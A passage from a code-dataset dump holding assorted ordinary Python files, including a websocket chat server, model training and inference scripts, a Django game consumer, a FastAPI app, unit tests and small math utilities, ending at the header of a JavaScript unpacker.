2018.\r\nRewritten in 2020.\r\nFor more details about CloudLink, please visit\r\nhttps://github.com/MikeDev101/cloudlink\r\n\"\"\"\r\n\r\nvers = \"S1.1\"\r\n\r\nimport asyncio\r\nimport json\r\nimport websockets\r\nimport sys\r\n\r\nPORT = 3000\r\n\r\nglobal USERNAMES\r\n\r\nSTREAMS = {\"gs\": \"\"} #Define data streams, will improve upon this design later\r\nUSERS = set() #create unorganized, non-indexed set of users\r\nUSERNAMES = [] #create organized, indexable list of users\r\n\r\ndef state_event_global(): #Prepare data to be sent to clients on the global data stream\r\n x = {\r\n \"type\":\"gs\",\r\n \"data\":str(STREAMS[\"gs\"])\r\n }\r\n return json.dumps(x)\r\n\r\nasync def notify_state_global():\r\n if USERS:\r\n message = state_event_global() # Send global data to every client\r\n await asyncio.wait([user.send(message) for user in USERS])\r\n\r\ndef state_event_private(uname): #Prepare data to be sent to specific clients on the private data streams\r\n y = {\r\n \"type\":\"ps\",\r\n \"data\":str(STREAMS[uname]),\r\n \"id\":str(uname)\r\n }\r\n return json.dumps(y)\r\n\r\nasync def notify_state_private(e):\r\n if USERS:\r\n message = state_event_private(e) #Send private data to every client, only one client will store the data, others will ignore\r\n #await asyncio.wait([user.send(message) for user in USERS])\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\ndef prepare_usernames(): # Generate primitive array of usernames\r\n y = \"\"\r\n for x in range(len(USERNAMES)):\r\n y = str(y + USERNAMES[x] + \";\")\r\n z = {\r\n \"type\":\"ul\",\r\n \"data\":str(y)\r\n }\r\n return json.dumps(z)\r\n\r\nasync def update_username_lists():\r\n if USERS:\r\n message = prepare_usernames() #Send username list to all clients\r\n #await asyncio.wait([user.send(message) for user in USERS])\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\nasync def refresh_username_lists():\r\n if USERS:\r\n z = {\r\n \"type\":\"ru\",\r\n \"data\":\"\"\r\n }\r\n message = json.dumps(z)\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\nasync def register(websocket): #Create client session\r\n USERS.add(websocket)\r\n\r\nasync def unregister(websocket): #End client session\r\n USERS.remove(websocket)\r\n\r\nasync def server(websocket, path):\r\n global USERNAMES\r\n await register(websocket)\r\n await notify_state_global()\r\n await update_username_lists()\r\n try:\r\n await websocket.send(state_event_global())\r\n async for message in websocket:\r\n data = message.split(\"\\n\")\r\n if data[0] == \"<%gs>\": # Global stream update command\r\n STREAMS[\"gs\"] = str(data[2])\r\n await notify_state_global()\r\n elif data[0] == \"<%ps>\": # Private stream update command\r\n if data[2] in USERNAMES:\r\n STREAMS[str(data[2])] = str(data[3])\r\n await notify_state_private(str(data[2]))\r\n elif data[0] == \"<%ds>\": # Disconnect command\r\n if data[1] in USERNAMES:\r\n print(\"[ i ] Disconnecting user:\", str(data[1]))\r\n USERNAMES.remove(str(data[1]))\r\n STREAMS.pop(str(data[1]))\r\n await unregister(websocket)\r\n await update_username_lists()\r\n elif data[0] == \"<%sn>\": # Append username command\r\n print(\"[ i ] User connected:\", data[1])\r\n USERNAMES.append(str(data[1]))\r\n STREAMS[str(data[1])] = \"\"\r\n await update_username_lists()\r\n elif data[0] == \"<%rf>\": # Refresh user list\r\n print(\"[ i ] Refreshing user list...\")\r\n USERNAMES = []\r\n await update_username_lists()\r\n await refresh_username_lists()\r\n else: # Generic unknown command response\r\n print(\"[ ! ] Error: Unknown command:\", str(data))\r\n except Exception as e:\r\n print(\"[ i ] Whoops! Something went wrong. Here's the error:\", e)\r\n await unregister(websocket) # If all things fork up, kill the connection\r\n USERNAMES = [] # Force update of usernames in the server\r\n await update_username_lists()\r\n await refresh_username_lists()\r\n\r\nprint(\"MikeDEV's CloudLink API Server v\" + vers + \"\\nNow listening for requests on port \" + str(PORT) + \".\\n\")\r\ncl_server = websockets.serve(server, \"localhost\", PORT)\r\n\r\nwhile True:\r\n try:\r\n asyncio.get_event_loop().run_until_complete(cl_server)\r\n asyncio.get_event_loop().run_forever()\r\n except:\r\n print(\"[ i ] Stopping the CloudLink API server...\")\r\n sys.exit()\r\n","repo_name":"retronbv/CloudLinkGC","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71830726506","text":"from transformers import T5Tokenizer, T5ForConditionalGeneration\nimport torch\nimport json\n\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\n\ntokenizer = T5Tokenizer.from_pretrained(\"google/flan-t5-xxl\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"google/flan-t5-xxl\")\n\nmodel.parallelize({\n\t\t 0: [0,1, 2],\n\t\t 1: [3, 4, 5],\n\t\t 2: [6, 7, 8],\n\t\t 3: [9, 10, 11],\n\t\t 4: [12, 13, 14],\n\t\t 5: [15, 16, 17],\n\t\t 6: [18, 19, 20],\n\t\t 7: [21, 22, 23]\n\t\t})\n\n\nfr = open('Techspec_Wiki_Bing_Sum_test.jsonl','r')\nfw = open('FlanT5_Domain_knowledge_predicted','w')\nfw_ref = open('FlanT5_Domain_knowledge_references','w')\nlines = fr.readlines()\n\n\n\ncount = 0\n\nfor line in lines:\n\tprint(count)\n\tcount += 1\n\n\tline_obj = json.loads(line.strip())\n\t\n\tinput_ids = tokenizer(line_obj['input'], return_tensors=\"pt\").input_ids.to(device)\n\toutputs = model.generate(input_ids,max_length=2300,early_stopping=True)\n\tpredicted_result = tokenizer.decode(outputs[0]).replace(\"\", \"\").replace(\"\", \"\")\t\n\n\tfw.write(predicted_result+'\\n')\n\tfw_ref.write(line_obj['output']+'\\n')\n\nfw.close()\nfw_ref.close()","repo_name":"nlpxucan/flant5","sub_path":"flant5_inference.py","file_name":"flant5_inference.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37648584524","text":"# MICROSOFT\n\"\"\"\n SOLVED -- GFG Longest Consecutive 1's \n Return the longest run of 1s for a given integer n's binary representation.\n Example:\n Input: 242\n Output: 4\n 242 in binary is 0b11110010, so the longest run of 1 is 4.\n\"\"\"\ndef longest_run(n):\n # Time: O(logn) Space: O(1)\n run = curr = 0\n while n:\n if not n % 2:\n run = max(run, curr)\n curr = 0\n else:\n curr += 1\n n = n // 2\n\n return max(run, curr)\n\n\nprint(longest_run(242))\n# 4","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2019/11-November/11.06.py","file_name":"11.06.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43136028596","text":"import json\nfrom threading import Thread\nimport concurrent.futures\nfrom multiprocessing.pool import ThreadPool\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom .models import TicTacToe\n\n\nclass TicTacToeConsumer(AsyncJsonWebsocketConsumer):\n id_game=None\n\n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['sala']\n self.room_group_name = 'sala_%s' % self.room_name\n \n # Unirse a la sala\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n await self.accept()\n\n # Abandono de sala o desconexión.\n async def disconnect(self, close_code):\n print(\"Desconectado\",self.id_game)\n if self.id_game != None:\n thread=Thread(target=TicTacToe.discPartida,args=(self,self.id_game))\n thread.start()\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n \n async def receive(self, text_data):\n \"\"\"\n Receive mensaje from WebSocket.\n Get the evento and send the appropriate evento\n \"\"\"\n response = json.loads(text_data)\n evento = response.get(\"evento\", None)\n mensaje = response.get(\"mensaje\", None)\n if evento == 'MOVE':\n # Send mensaje to room group\n if mensaje != None:\n thread=Thread(target=TicTacToe.updateTablero,args=(self,mensaje['id_game'],mensaje['ficha'],mensaje['index']))\n thread.start()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n \"evento\": \"MOVE\"\n })\n \n if evento == 'START':\n # Send mensaje to room group\n print('inicio partida')\n if mensaje != None:\n with concurrent.futures.ThreadPoolExecutor() as executor:\n thread = executor.submit(TicTacToe.crearSala,mensaje['sala'],mensaje['jugador'],mensaje['ficha'])\n self.id_game = thread.result()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n 'evento': \"START\"\n })\n \n if evento == 'END':\n # Send mensaje to room group\n if mensaje != None:\n thread=Thread(target=TicTacToe.cerrarPartida,args=(self,mensaje['id_game'],mensaje['ficha'],mensaje['index'],mensaje['final']))\n thread.start()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n 'evento': \"END\"\n })\n \n\n async def send_mensaje(self, res):\n \"\"\" Receive mensaje from room group \"\"\"\n # Send mensaje to WebSocket\n if self.id_game != None:\n await self.send(text_data=json.dumps({\n \"respuesta\": res,\n \"id_game\": str(self.id_game),\n }))\n else:\n await self.send(text_data=json.dumps({\n \"respuesta\": res,\n }))","repo_name":"Francisco-Neff/boardgames","sub_path":"tictactoe/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40861195125","text":"from fastapi import FastAPI\nfrom fastapi.responses import Response\nfrom annotations import Annotations as A\nfrom data_extactor import extract_data_from_webpage\nfrom llm_handler import query_llm\n\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Salam 3alam\"}\n\n\n@app.post(\n \"/prodive_data_source\",\n summary='Provide the url for a website to scrap and add to the knowledge base',\n description=\n 'Provide the URL for web content, which will be used as knowledge database for future question creation. '\n 'Content will be scrapped from URL and all subpages recursively and converted to knowledge database.'\n '\\n\\n'\n 'Provided knowledge_base_id will be associated with created knowledge database.'\n '\\n\\n'\n 'To check for existing knowledge databases and their respective IDs, '\n 'see `/api/v1/content/list` (not implemented).'\n)\nasync def extract_data_from_web_data_source(\n knowledge_base_id: A.knowledge_base_id,\n url: A.url\n):\n if extract_data_from_webpage(knowledge_base_id=knowledge_base_id, url=url):\n return Response(status_code=200)\n else:\n return Response(status_code=400)\n \n\n@app.post(\n \"/generate_activity\",\n summary='Generate an assessment activity for a given outcome and a knowledge database',\n description=\n 'Generate an assessment activity of questions for the given knowledge base.'\n 'If no knowledge is associated with given ID, returns an error.'\n)\nasync def generate_activity(\n knowledge_base_id: A.knowledge_base_id,\n outcome: A.outcome,\n number_of_questions: A.number_of_questions,\n question_types: A.question_types\n) -> str:\n return query_llm(knowledge_base_id, outcome, number_of_questions, question_types)\n","repo_name":"nurlingo/llm-examiner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20624061415","text":"import re\r\nimport os\r\nimport sys\r\n\r\ndef Main(file_path):\r\n files = os.listdir(file_path[1][:-12])\r\n\r\n for f in files:\r\n if f[(len(f)-3):] == 'mf4':\r\n print(f)\r\n \r\nif __name__ == \"__main__\":\r\n Main(sys.argv)","repo_name":"AtillaP/ScriptsForDailyJob","sub_path":"filelistOfAFolder.py","file_name":"filelistOfAFolder.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33114933774","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 29 17:16:32 2022\n\n@author: tle19\nhttps://medium.com/nerd-for-tech/image-classification-using-transfer-learning-pytorch-resnet18-32b642148cbe\n\nfully connected layers\nhttps://pythonguides.com/pytorch-fully-connected-layer/\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, models, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport pandas as pd\nimport json\nimport matplotlib as mpl\nmpl.use('Agg')\nos.chdir('/home/tle19/Desktop/ResNet_pretrained/')\nimport csv\nimport json\nimport sys\nimport glob\nfrom PIL import Image\nfrom datetime import datetime, date\nfrom torchvision.utils import make_grid\nimport shutil\nfrom torch.utils.data import Dataset, DataLoader, WeightedRandomSampler\nfrom sklearn.model_selection import train_test_split\nfrom batchgenerators.utilities.file_and_folder_operations import *\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\n\nfrom custom_transforms import *\n\n\ntraining_validation_path = '/home/tle19/Desktop/ResNet_pretrained/Images/'\n\nclasses=['3A', '3B', '3C', '4A', '4B', '4C']\n# classes=['3A', '3B', '3C']\n# classes=['4A', '4B', '4C']\nim_paths, labels=[], []\n\n# Find image paths\n_=[im_paths.append(glob.glob(os.path.join(training_validation_path, i, \"*\"))) for i in classes]\nim_paths=np.hstack(im_paths)\n# Collect labels from image folders\n_=[labels.append(j.split('/')[-2]) for j in im_paths]\n\n\n# Split into training and test\nX_train, X_test, y_train, y_test = train_test_split(im_paths, labels, test_size=0.1, shuffle=True, stratify=labels)\nnp.save(f'/home/tle19/Desktop/ResNet_pretrained/results/test_cases-{date.today().strftime(\"%d%B\")}{datetime.now().strftime(\"%H:%M\")}.npy', X_test)\n# Split into training and val\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=1/4.5, shuffle=True, stratify=y_train)\n\nprint(f'There are {len(X_train)} training images and {len(X_val)} test images ({len(X_train)+len(X_val)} total)')\n\n#%%\n\"\"\"Set dataloader\"\"\"\n\nclass hair_dataset(Dataset):\n def __init__(self, root_dir, transforms):\n self.root_dir = root_dir\n self.transforms = transforms\n\n def __len__(self):\n return len(self.root_dir)\n\n def __getitem__(self, index):\n # Select sample\n image = Image.open(self.root_dir[index]).convert(\"RGB\")\n label=self.convert_labels(self.root_dir[index])\n sample={'image': image, 'label': label} #Make image and label a dict pair\n\n transformed_im = self.transforms(sample) #Perform transforms\n\n return (transformed_im['image'], transformed_im['label'])\n\n# Convert alphabetical labels to numbers (starting at 1)\n def convert_labels(self, dir):\n classes=['3A', '3B', '3C', '4A', '4B', '4C']\n\n label=np.where(dir.split('/')[-2]==np.array(classes))[0][0] #Labels between 1-6, set label as index in list\n return label\n\n# Calculate normalisation parameters\nbatch_size = 8\nimg_height, img_width = 400, 400\n\n#%%\n\"\"\"Create datasets\"\"\"\nmeans= [0.449891447249903, 0.34121201611416146, 0.2946232938238485]\nstds= [0.31363333313315633, 0.25191345914521435, 0.22231266962369908]\n\ntrain_transforms = transforms.Compose([\n RandomFlip(),\n RandomRotate(),\n RandomCrop(sizes=(400)), #220\n RandomGaussianBlur(),\n # RandomInv(),\n Random_Brightness(),\n Random_Contrast(),\n Random_Saturation(),\n Adjust_Gamma(),\n Adjust_Sharpness(),\n ToTensor(),\n Normalise(means=means,stds=stds,),\n Rescale_pixel_values(),\n Resize(sizes=img_height),\n]) \n\nval_transforms = transforms.Compose([\n ToTensor(),\n Normalise(means=means,stds=stds,),\n Rescale_pixel_values(),\n Resize(sizes=img_height),\n]) \n \n#define class sampler\n# This can be removed\ndef find_sampler(training_samples, classes, batch_size):\n _,counts=np.unique(training_samples, return_counts=True) #find no of unique labels\n class_weights=[sum(counts)/c for c in counts] #find weights\n # class_weights[1]*=0.5\n labels=[np.where(training_samples[i]==np.array(classes))[0][0] for i in range(len(training_samples))]#convert hair labels to ints\n example_weights=[class_weights[i] for i in labels]#assign weight to each sample\n sampler=WeightedRandomSampler(example_weights, len(training_samples), replacement=False)\n return sampler\n \n#load training data\ntraining_sampler=find_sampler(y_train, classes, batch_size)\ntrain_dataset = hair_dataset(X_train, transforms=train_transforms)\ntrain_dl = DataLoader(train_dataset, sampler=training_sampler, batch_size=batch_size, num_workers=4, pin_memory=True)\n\n#load val data\nval_sampler=find_sampler(y_val, classes, batch_size)\nval_dataset = hair_dataset(X_val, transforms=val_transforms)\nval_dl = DataLoader(val_dataset, sampler=val_sampler, batch_size=batch_size, num_workers=4, pin_memory=True)\n\n#PLot a batch \n# data_iter = iter(train_dl)\n# images, labels = data_iter.next()\n\n# grid = make_grid(images[0], padding=2)\n# fig = plt.figure(figsize=(20, 20))\n# plt.imshow(grid.numpy().transpose((1, 2, 0)))\n# plt.axis('off')\n#%% TRAINING\n#iterations needed for each epoch\niterations=int(np.ceil(len(X_train)/batch_size))\n\nepochs=150\nprint(f'{epochs} epochs and {iterations} iterations')\n\n# OPTIMISER PARAMETERS\nlr = 0.001 # authors cite 0.1\nmomentum = 0.9\nweight_decay = 1e-4 #0.0001 \n\n# LEARNING RATE ADJUSTMENT\n# milestones = [round(0.5*epochs/iterations), round(0.75*epochs/iterations)]\nmilestones = [25, 50]\nmilestones_on=False\nprint(f'LR reduced by factor of 10 at epochs {milestones}' if milestones_on else 'No LR reduction')\n# Divide learning rate by 10 at each milestone\ngamma = 0.1\nprint('Using ', classes)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # device object\nmodel = models.googlenet(pretrained=True) #load resnet18 model\n\nmodel.fc = nn.Linear(model.fc.in_features, len(np.unique(classes)), bias=True) #replace 2 output notes with no of classes\nmodel = model.to(device) \n# print(model)\n#%%\ncriterion = nn.CrossEntropyLoss() #(set loss function)\noptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay)\nscheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=milestones, gamma=gamma)\n\n#save parameters\nparams={ 'lr': lr, 'momentum': momentum, \n 'weight_decay': weight_decay, 'milestones on/off': milestones_on, 'milestones': milestones, 'epochs': epochs, 'gamma': gamma, 'labels_used': classes}\nsave_json(params, '/home/tle19/Desktop/ResNet_pretrained/results/params.json')\n\n#set save path\nsave_path = f'/home/tle19/Desktop/ResNet_pretrained/results/resnet50-{date.today().strftime(\"%d%B\")}{datetime.now().strftime(\"%H:%M\")}.pth'\n\n#copy current transforms file\n_=shutil.copy('/home/tle19/Desktop/ResNet_pretrained/custom_transforms.py', '/home/tle19/Desktop/ResNet_pretrained/results/custom_transforms.py')\n\nbest_acc=0.\nbest_acc1=0.\ncols = ['epoch', 'train_err', 'val_err', 'train_loss', 'val_loss']\nresults_df = pd.DataFrame(columns=cols).set_index('epoch')\nfor epoch in range(epochs): #(loop for every epoch)\n t0 = time.time()\n print(\"Epoch {}\".format(epoch)) #(printing message)\n \"\"\" Training Phase \"\"\"\n model.train() #(training model)\n running_loss, running_corrects = 0. ,0 #(set loss 0)\n # load a batch data of images\n for i, (inputs, labels) in enumerate(train_dl):\n inputs = inputs[0].to(device)\n labels = labels.to(device) \n # forward inputs and get output\n optimizer.zero_grad()\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n # get loss value and update the network weights\n loss.backward()\n optimizer.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n if milestones_on==True:\n scheduler.step()\n train_loss = running_loss / len(train_dataset)\n train_acc = running_corrects / len(train_dataset) * 100.\n print('[Train #{}] Loss: {:.4f} Acc: {:.4f}%'.format(epoch, train_loss, train_acc))\n \n \"\"\" Testing Phase \"\"\"\n model.eval()\n with torch.no_grad():\n running_loss, running_corrects = 0. ,0 #(set loss 0)\n\n for inputs, labels in val_dl:\n inputs = inputs[0].to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n val_loss = running_loss / len(val_dataset)\n val_acc = running_corrects / len(val_dataset) * 100.\n print('[Test #{}] Loss: {:.4f} Acc: {:.4f}%'.format(epoch, val_loss, val_acc))\n \n # if val_acc>80:\n # optimizer = optim.SGD(model.parameters(), lr=lr/10, momentum=momentum, weight_decay=weight_decay)\n \n results_df.loc[epoch] = [train_acc.cpu(), val_acc.cpu(), train_loss, val_loss] \n print('This epoch took {} seconds'.format(np.round(time.time() - t0, 3)))\n if (val_acc > best_acc):\n torch.save(model.state_dict(), save_path)\n best_acc = val_acc\n if train_acc>best_acc1:\n best_acc1=train_acc\n \n fig, (ax1,ax2) = plt.subplots(nrows=1, ncols=2, figsize = (20,10), tight_layout = True)\n # _=plt.subplot(121)\n plt.rcParams['font.size'] = '20'\n ax1.plot(np.arange(len(results_df.train_err.values)), results_df.train_err.values, label='train')\n ax1.plot(np.arange(len(results_df.train_err.values)), results_df.val_err.values, label='val')\n ax1.legend(loc='upper left')\n ax1.set_xlabel('epochs')\n ax1.set_ylabel('Acc (%)')\n txt='best train score: ' + str(np.round(best_acc1.cpu().detach().numpy(),1)) + '\\nbest val score: ' + str(np.round(best_acc.cpu().detach().numpy(),1))\n ax1.text(0.5, 1, txt, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)\n\n #plot loss \n # _=plt.subplot(122)\n ax2.plot(np.arange(len(results_df.train_loss.values)), results_df.train_loss.values, label='train', color='r')\n ax2.plot(np.arange(len(results_df.train_loss.values)), results_df.val_loss.values, label='val', color='g')\n ax2.legend(loc='upper right')\n ax2.set_xlabel('epochs')\n ax2.set_ylabel('CE Loss')\n txt='best train loss: ' + str(np.round(min(results_df.train_loss.values),3)) + '\\nbest val loss: ' + str(np.round(min(results_df.val_loss.values),3))\n ax2.text(1.6, 1, txt, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)\n plt.savefig('/home/tle19/Desktop/ResNet_pretrained/results/progress.png')\n plt.close(fig)\n \n_\n","repo_name":"tiarnalee/ResNet_pretrained","sub_path":"resnet_pt.py","file_name":"resnet_pt.py","file_ext":"py","file_size_in_byte":10726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27475752436","text":"import pytest\nimport json\nfrom botocore.stub import Stubber, ANY\nfrom src import get_boleto_analysis\n\n@pytest.fixture\ndef textract_stub():\n with Stubber(get_boleto_analysis.textract) as stubber:\n yield stubber\n stubber.assert_no_pending_responses()\n\n@pytest.fixture\ndef sns_stub():\n with Stubber(get_boleto_analysis.sns) as stubber:\n yield stubber\n stubber.assert_no_pending_responses()\n\n@pytest.fixture\ndef sns_textract_notification():\n with open(\"./events/sns_textract_notification.json\", \"r\") as fp:\n return json.load(fp)\n\n@pytest.fixture\ndef textract_response():\n with open(\"./events/textract_response.json\", \"r\") as fp:\n return json.load(fp)\n\ndef test_lambda_handler(sns_textract_notification, lambda_context, textract_response, textract_stub, sns_stub):\n\n textract_stub.add_response(\n method = \"get_document_analysis\",\n service_response = textract_response,\n expected_params = {\"JobId\": ANY}\n )\n\n sns_stub.add_response(\n method = \"publish\",\n service_response = {},\n expected_params = {\"TopicArn\": ANY, \"Message\": ANY}\n )\n\n with textract_stub, sns_stub:\n ret = get_boleto_analysis.lambda_handler(sns_textract_notification, lambda_context)\n\n assert ret[0][\"KeyValuePairs\"][\"BarcodeNumber\"] == \"23793381286002890582082000063303882800000068040\"","repo_name":"aws-samples/textract-boleto-reader","sub_path":"tests/unit/test_get_boleto_analysis.py","file_name":"test_get_boleto_analysis.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16700215002","text":"\"\"\" Utilities \"\"\"\n\nimport torch\nimport numpy as np\nimport random\n\ndef set_seed(seed=None):\n\t\"\"\"Set random seed, or reset if None.\n\t\"\"\"\n\trandom.seed(seed)\n\tnp.random.seed(seed)\n\tif seed is None: \n\t\ttorch.manual_seed(random.randint(1,1e6))\n\telse:\n\t\ttorch.manual_seed(seed)\n\ndef spectral_radius(A: torch.Tensor, eps=None, n_iter=1000):\n\t\"\"\"Differentiable procedure for computing spectral radius (magnitude of largest eigenvalue)\n\n\tArgs:\n\t\tA: square matrix\n\t\teps: (optional) if provided, uses convergence-based power iteration method\n\t\tn_iter: (optional) if provided, uses power iterations with this many steps (default; 1000 steps)\n\n\tFor 2x2 systems, performs direct computation.\n\t\"\"\"\n\tif A.shape[0] == A.shape[1] == 2: \n\t\ttr, det = A.trace(), A.det()\n\t\tdisc = tr**2 - 4*det \n\t\tif disc >= 0:\n\t\t\treturn torch.max(\n\t\t\t\ttorch.abs(tr + torch.sqrt(disc)) / 2,\n\t\t\t\ttorch.abs(tr - torch.sqrt(disc)) / 2\n\t\t\t)\n\t\telse:\n\t\t\treturn torch.sqrt((tr/2)**2 - disc/4)\n\telif eps is not None:\n\t\treturn _sp_radius_conv(A, eps)\n\telse:\n\t\treturn _sp_radius_niter(A, n_iter)\n\ndef _sp_radius_conv(A: torch.Tensor, eps: float):\n\tv = torch.ones((A.shape[0], 1), device=A.device)\n\tv_new = v.clone()\n\tev = v.t()@A@v\n\tev_new = ev.clone()\n\twhile (A@v_new - ev_new*v_new).norm() > eps:\n\t\tv = v_new\n\t\tev = ev_new\n\t\tv_new = A@v\n\t\tv_new = v_new / v_new.norm()\n\t\tev_new = v_new.t()@A@v_new\n\treturn ev_new\n\ndef _sp_radius_niter(A: torch.Tensor, n_iter: int):\n\tv = torch.ones((A.shape[0], 1), device=A.device)\n\tfor _ in range(n_iter):\n\t\tv = A@v\n\t\tv = v / v.norm()\n\tev = v.t()@A@v\n\treturn ev\n\ndef is_semistable(P: torch.Tensor, eps=1e-2):\n\t\"\"\"Semistability test for transfer operator using spectral radius \"\"\"\n\treturn spectral_radius(P).item() <= 1.0 + eps\n\ndef rmse(X: torch.Tensor, Y: torch.Tensor):\n\tassert X.shape == Y.shape\n\treturn torch.sqrt(torch.mean((X - Y)**2)).item()\n\n\"\"\" Tests \"\"\"\n\nif __name__ == '__main__':\n\tset_seed(9001)\n\tdevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\tprec = 1e-2\n\n\t# 2d spectral radius test\n\tfor _ in range(100):\n\t\td = 2\n\t\tA = torch.randn((d, d), device=device)\n\t\te = np.random.uniform(0.1, 2.00)\n\t\tL = torch.linspace(e, 0.01, d, device=device)\n\t\tP = torch.mm(torch.mm(A, torch.diag(L)), torch.pinverse(A))\n\n\t\tnp_e_max = np.abs(np.linalg.eigvals(P.cpu().numpy())).max()\n\t\tpwr_e_max = spectral_radius(P).item()\n\t\tprint('True:', e, 'numpy:', np_e_max, 'pwr_iter:', pwr_e_max)\n\t\tassert np.abs(e - pwr_e_max) < prec\n\n\t# Nd Power iteration test\n\tfor _ in range(100):\n\t\td = 100\n\t\tA = torch.randn((d, d), device=device)\n\t\te = np.random.uniform(0.1, 1.10)\n\t\tL = torch.linspace(e, 0.01, d, device=device)\n\t\tP = torch.mm(torch.mm(A, torch.diag(L)), torch.pinverse(A))\n\n\t\tnp_e_max = np.abs(np.linalg.eigvals(P.cpu().numpy())).max()\n\t\tpwr_e_max = spectral_radius(P).item()\n\t\tprint('True:', e, 'numpy:', np_e_max, 'pwr_iter:', pwr_e_max)\n\t\tassert np.abs(e - pwr_e_max) < prec","repo_name":"asrvsn/lkf","sub_path":"totorch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15492133146","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom random import normalvariate\n\n\ndef brownian_bridge(start, end, T, increment=0.1):\n \"\"\"\n Produces a simulated path of a brownian bridge.\n :param start: B_0\n :param end: B_T\n :param T: defines interval 0 < t < T\n :param increment: ð�š«T\n :return: simulated brownian bridge path x_t on the interval 0 < t < T\n \"\"\"\n x = [start]\n interval = np.linspace(0+increment, T, int(T//increment))\n for t in interval[:-1]:\n x_prev = x[-1]\n z_i = normalvariate(0, 1)\n x_t = x_prev + (end - x_prev) * increment/(T-t) + ((increment*(T-t-increment))/(T-t))**0.5 * z_i\n x.append(x_t)\n\n plt.plot(interval, x, label='Brownian Bridge')\n plt.plot(interval, [((end-start)/T)*y + start for y in interval], label='Expectation')\n plt.legend()\n plt.grid()\n plt.show()\n return x\n\n\nif __name__ == '__main__':\n brownian_bridge(10, 50, 100)\n","repo_name":"Seannnnnnnnnnn/FinancialEngineering","sub_path":"BrownianBridge.py","file_name":"BrownianBridge.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37534488104","text":"from signal import signal\nimport pandas as pd\nfrom scipy.stats import chi2\nimport sys\nimport numpy as np\n\n\nsignatures = pd.read_csv('C:\\\\Users\\\\dmitr\\\\Desktop\\\\project work\\\\dummy data\\\\signatures.csv')\n\n\nmeans = []\n\nfor i in range(57):\n means.append(signatures[str(i)].mean())\n\ndiviations = []\n\nfor index, row in signatures.iterrows():\n diviation = 0\n for i in range(57):\n val = row[str(i)]\n mean = means[i]\n diviation += abs((val - mean)/mean)\n diviations.append((diviation, index))\n\ndiviations.sort()\nprint(diviations)","repo_name":"DmitriyFilippov/project-work","sub_path":"LEGACY-outlier calc.py","file_name":"LEGACY-outlier calc.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32692377889","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n\n#\n# Modified version From https://github.com/Kodi-vStream/venom-xbmc-addons\n#\n#\n# Unpacker for Dean Edward's p.a.c.k.e.r, a part of javascript beautifier\n# by Einar Lielmanis \n#\n# written by Stefano Sanfilippo \n#\n# usage:\n#\n# if detect(some_string):\n# unpacked = unpack(some_string)\n#\n\n\"\"\"Unpacker for Dean Edward's 